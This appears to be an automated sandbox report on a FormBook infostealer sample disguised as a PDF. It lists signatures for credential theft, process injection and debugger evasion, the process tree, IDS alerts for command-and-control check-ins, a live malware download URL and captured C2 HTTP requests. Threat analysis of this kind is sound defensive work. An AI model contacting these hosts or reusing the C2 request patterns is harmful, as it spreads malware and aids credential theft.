
Windows Analysis Report
SC_TR11670000_pdf.exe

Overview

General Information

Sample name: SC_TR11670000_pdf.exe
Analysis ID: 1574654
MD5: 1ead28dad1fae4a2478c61d096a3f162
SHA1: 503a22eb5ae11321abbce439d4548b037281018d
SHA256: 62cb069bd0351753a2cca2186257049a8ca4b5eaf3fbc9ef37080d9ec3f58f24
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SC_TR11670000_pdf.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe" MD5: 1EAD28DAD1FAE4A2478C61D096A3F162)
    • svchost.exe (PID: 3264 cmdline: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • oCCZhsVsNwIIN.exe (PID: 2256 cmdline: "C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • recover.exe (PID: 1908 cmdline: "C:\Windows\SysWOW64\recover.exe" MD5: D38B657A068016768CA9F3B5E100B472)
          • oCCZhsVsNwIIN.exe (PID: 5580 cmdline: "C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1360 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further entries not shown)

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ParentImage: C:\Users\user\Desktop\SC_TR11670000_pdf.exe, ParentProcessId: 6840, ParentProcessName: SC_TR11670000_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ProcessId: 3264, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ParentImage: C:\Users\user\Desktop\SC_TR11670000_pdf.exe, ParentProcessId: 6840, ParentProcessName: SC_TR11670000_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ProcessId: 3264, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:08:08.290667+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49836 | 45.200.148.45 | 80 | TCP
2024-12-13T13:08:30.307107+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49886 | 45.200.148.45 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:07:05.530729+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.158.234 | 80 | TCP
2024-12-13T13:07:08.252689+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 172.67.158.234 | 80 | TCP
2024-12-13T13:07:10.908824+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 172.67.158.234 | 80 | TCP
2024-12-13T13:07:20.468418+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 161.97.142.144 | 80 | TCP
2024-12-13T13:07:23.138023+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 161.97.142.144 | 80 | TCP
2024-12-13T13:07:25.936215+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49780 | 161.97.142.144 | 80 | TCP
2024-12-13T13:07:35.326587+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49802 | 209.74.64.58 | 80 | TCP
2024-12-13T13:07:38.014967+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49813 | 209.74.64.58 | 80 | TCP
2024-12-13T13:07:40.722909+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 209.74.64.58 | 80 | TCP
2024-12-13T13:08:35.450355+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49946 | 104.21.74.79 | 80 | TCP
2024-12-13T13:08:38.122267+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49953 | 104.21.74.79 | 80 | TCP
2024-12-13T13:08:40.780985+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49959 | 104.21.74.79 | 80 | TCP
2024-12-13T13:08:50.698088+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49984 | 3.33.130.190 | 80 | TCP
2024-12-13T13:08:53.357819+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49992 | 3.33.130.190 | 80 | TCP
2024-12-13T13:08:56.049620+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49998 | 3.33.130.190 | 80 | TCP
2024-12-13T13:09:05.300297+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 13.248.169.48 | 80 | TCP
2024-12-13T13:09:08.375339+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 13.248.169.48 | 80 | TCP
2024-12-13T13:09:11.032302+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 13.248.169.48 | 80 | TCP
2024-12-13T13:09:23.555205+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 144.76.190.39 | 80 | TCP
2024-12-13T13:09:26.191110+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 144.76.190.39 | 80 | TCP
2024-12-13T13:09:29.106835+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 144.76.190.39 | 80 | TCP
2024-12-13T13:09:46.998712+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 198.251.84.200 | 80 | TCP
2024-12-13T13:09:49.662523+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 198.251.84.200 | 80 | TCP
2024-12-13T13:09:52.307580+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50036 | 198.251.84.200 | 80 | TCP
2024-12-13T13:10:02.206907+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 217.160.0.60 | 80 | TCP
2024-12-13T13:10:04.777592+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 217.160.0.60 | 80 | TCP
2024-12-13T13:10:07.610447+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50040 | 217.160.0.60 | 80 | TCP
2024-12-13T13:10:17.022533+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50042 | 161.97.142.144 | 80 | TCP
2024-12-13T13:10:19.888644+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50043 | 161.97.142.144 | 80 | TCP
2024-12-13T13:10:23.366724+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50044 | 161.97.142.144 | 80 | TCP
2024-12-13T13:10:33.107170+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50046 | 172.67.149.64 | 80 | TCP
2024-12-13T13:10:35.778951+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50047 | 172.67.149.64 | 80 | TCP
2024-12-13T13:10:38.435162+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50048 | 172.67.149.64 | 80 | TCP
2024-12-13T13:10:48.113015+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50050 | 3.33.130.190 | 80 | TCP
2024-12-13T13:10:50.763553+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50051 | 3.33.130.190 | 80 | TCP


AV Detection

Source: http://45.200.148.45/dashboard/xl.exe; Avira URL Cloud: Label: malware
Source: SC_TR11670000_pdf.exe; ReversingLabs: Detection: 76%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: SC_TR11670000_pdf.exe; Joe Sandbox ML: detected
Source: SC_TR11670000_pdf.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: recover.pdb; source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: oCCZhsVsNwIIN.exe, 00000002.00000000.1840086036.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4204891761.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP; source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: recover.pdbGCTL; source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B44696 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B4C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B4C93C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B4F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B4F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B4F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B43A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B43D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B4BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\recover.exe; Code function: 3_2_02F8C5C0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\recover.exe; Code function: 3_2_02F79DD0 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\recover.exe; Code function: 3_2_02F7E1E7 4x nop then pop edi
Source: C:\Windows\SysWOW64\recover.exe; Code function: 3_2_037D04DE 4x nop then mov ebx, 00000004h

Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 172.67.158.234:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 172.67.158.234:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 172.67.158.234:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 209.74.64.58:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49813 -> 209.74.64.58:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 104.21.74.79:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49946 -> 104.21.74.79:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49959 -> 104.21.74.79:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 198.251.84.200:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 144.76.190.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 217.160.0.60:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49984 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 144.76.190.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 144.76.190.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 172.67.149.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 209.74.64.58:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 172.67.149.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49998 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 172.67.149.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 217.160.0.60:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 198.251.84.200:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 161.97.142.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49992 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 198.251.84.200:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 217.160.0.60:80
                Source: DNS query: www.030002128.xyz
                Source: DNS query: www.tlcatlas.xyz
                Source: DNS query: www.030002059.xyz
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; IP Address: 161.97.142.144
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: CONTABODE
Source: Network traffic; Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49836 -> 45.200.148.45:80
Source: Network traffic; Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49886 -> 45.200.148.45:80
Source: unknown; TCP traffic detected without corresponding DNS query: 45.200.148.45 (10 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe; Code function: 0_2_00B525E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; HTTP traffic detected:
    GET /jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
    Host: www.idsmart.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /90oi/?9B_ppt=WdGxuHz/ABXbnxDuMcWeaiAtNv6zbYEnDSFRQwgnlI3l3VbPFG0OHzktVpkkqW+LG4OUxeltpIvdJ1ISlR18S3Wjl2Tf6Ort1F9q8CbBD/86Ywb40YjbYcY=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
    Host: www.sortcouponspot.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /fc2m/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=KaGAZ9vwQsncwU5nwlZluG2PCpLyPNSLaK7d9k0MP6z2D5ilW5umnwpx9tHUSLWoKaQi0X2AhHSzaYzkOXBuKcmexX+9MUXLmjX2PXKDTiDXtSOs+tfg8AM= HTTP/1.1
    Host: www.030002128.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Source: global traffic; HTTP traffic detected:
    GET /0b3u/?9B_ppt=tWVMWWWOulwRw9KA3wu02d5KKGx3TcL9CpbeAEn5Jw6VZuj1AgCYZL+g8ZTCy/ZQwoOBNq7+YyWmcbYUwrN2tYgo9+cX77aYkG8YuMsAadwBJ35R4yxBFts=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
    Host: www.quicktraze.website
